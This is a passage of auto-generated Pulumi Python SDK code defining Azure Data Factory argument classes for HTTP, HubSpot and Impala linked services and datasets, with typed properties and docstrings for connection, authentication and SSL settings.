:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used on files.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of files.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any relative_url: The relative URL, based on the URL in the HttpLinkedService, that refers to an HTTP file. Type: string (or Expression with resultType string).
:param Any request_body: The body for the HTTP request. Type: string (or Expression with resultType string).
:param Any request_method: The HTTP method for the HTTP request. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HttpFile')
if additional_headers is not None:
pulumi.set(__self__, "additional_headers", additional_headers)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if relative_url is not None:
pulumi.set(__self__, "relative_url", relative_url)
if request_body is not None:
pulumi.set(__self__, "request_body", request_body)
if request_method is not None:
pulumi.set(__self__, "request_method", request_method)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="additionalHeaders")
def additional_headers(self) -> Optional[Any]:
"""
The headers for the HTTP Request. e.g. request-header-name-1:request-header-value-1
...
request-header-name-n:request-header-value-n. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "additional_headers")
@additional_headers.setter
def additional_headers(self, value: Optional[Any]):
pulumi.set(self, "additional_headers", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used on files.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of files.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="relativeUrl")
def relative_url(self) -> Optional[Any]:
"""
The relative URL, based on the URL in the HttpLinkedService, that refers to an HTTP file. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "relative_url")
@relative_url.setter
def relative_url(self, value: Optional[Any]):
pulumi.set(self, "relative_url", value)
@property
@pulumi.getter(name="requestBody")
def request_body(self) -> Optional[Any]:
"""
The body for the HTTP request. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "request_body")
@request_body.setter
def request_body(self, value: Optional[Any]):
pulumi.set(self, "request_body", value)
@property
@pulumi.getter(name="requestMethod")
def request_method(self) -> Optional[Any]:
"""
The HTTP method for the HTTP request. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "request_method")
@request_method.setter
def request_method(self, value: Optional[Any]):
pulumi.set(self, "request_method", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HttpLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
cert_thumbprint: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
embedded_cert_data: Optional[Any] = None,
enable_server_certificate_validation: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Linked service for an HTTP source.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The base URL of the HTTP endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the HTTP server.
:param Any cert_thumbprint: Thumbprint of certificate for ClientCertificate authentication. Only valid for on-premises copy. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any embedded_cert_data: Base64 encoded certificate data for ClientCertificate authentication. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
:param Any enable_server_certificate_validation: If true, validate the HTTPS server SSL certificate. Default value is true. Type: boolean (or Expression with resultType boolean).
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for Basic, Digest, Windows, or ClientCertificate with EmbeddedCertData authentication.
:param Any user_name: User name for Basic, Digest, or Windows authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'HttpServer')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if cert_thumbprint is not None:
pulumi.set(__self__, "cert_thumbprint", cert_thumbprint)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if embedded_cert_data is not None:
pulumi.set(__self__, "embedded_cert_data", embedded_cert_data)
if enable_server_certificate_validation is not None:
pulumi.set(__self__, "enable_server_certificate_validation", enable_server_certificate_validation)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The base URL of the HTTP endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the HTTP server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="certThumbprint")
def cert_thumbprint(self) -> Optional[Any]:
"""
Thumbprint of certificate for ClientCertificate authentication. Only valid for on-premises copy. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cert_thumbprint")
@cert_thumbprint.setter
def cert_thumbprint(self, value: Optional[Any]):
pulumi.set(self, "cert_thumbprint", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="embeddedCertData")
def embedded_cert_data(self) -> Optional[Any]:
"""
Base64 encoded certificate data for ClientCertificate authentication. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "embedded_cert_data")
@embedded_cert_data.setter
def embedded_cert_data(self, value: Optional[Any]):
pulumi.set(self, "embedded_cert_data", value)
@property
@pulumi.getter(name="enableServerCertificateValidation")
def enable_server_certificate_validation(self) -> Optional[Any]:
"""
If true, validate the HTTPS server SSL certificate. Default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_server_certificate_validation")
@enable_server_certificate_validation.setter
def enable_server_certificate_validation(self, value: Optional[Any]):
pulumi.set(self, "enable_server_certificate_validation", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for Basic, Digest, Windows, or ClientCertificate with EmbeddedCertData authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name for Basic, Digest, or Windows authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class HubspotLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
refresh_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Hubspot Service linked service.
:param Any client_id: The client ID associated with your Hubspot application.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token obtained when initially authenticating your OAuth integration.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with your Hubspot application.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] refresh_token: The refresh token obtained when initially authenticating your OAuth integration.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "type", 'Hubspot')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if refresh_token is not None:
pulumi.set(__self__, "refresh_token", refresh_token)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with your Hubspot application.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access token obtained when initially authenticating your OAuth integration.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with your Hubspot application.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="refreshToken")
def refresh_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The refresh token obtained when initially authenticating your OAuth integration.
"""
return pulumi.get(self, "refresh_token")
@refresh_token.setter
def refresh_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "refresh_token", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class HubspotObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Hubspot Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HubspotObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ImpalaLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Impala server linked service.
:param pulumi.Input[str] authentication_type: The authentication type to use.
:param Any host: The IP address or host name of the Impala server. (e.g. 192.168.222.160)
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name when using UsernameAndPassword.
:param Any port: The TCP port that the Impala server uses to listen for client connections. The default value is 21050.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name used to access the Impala server. The default value is anonymous when using SASLUsername.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Impala')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication type to use.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Impala server. (e.g. 192.168.222.160)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name when using UsernameAndPassword.
"""
return pulumi.get(self, "password")
@password.setter
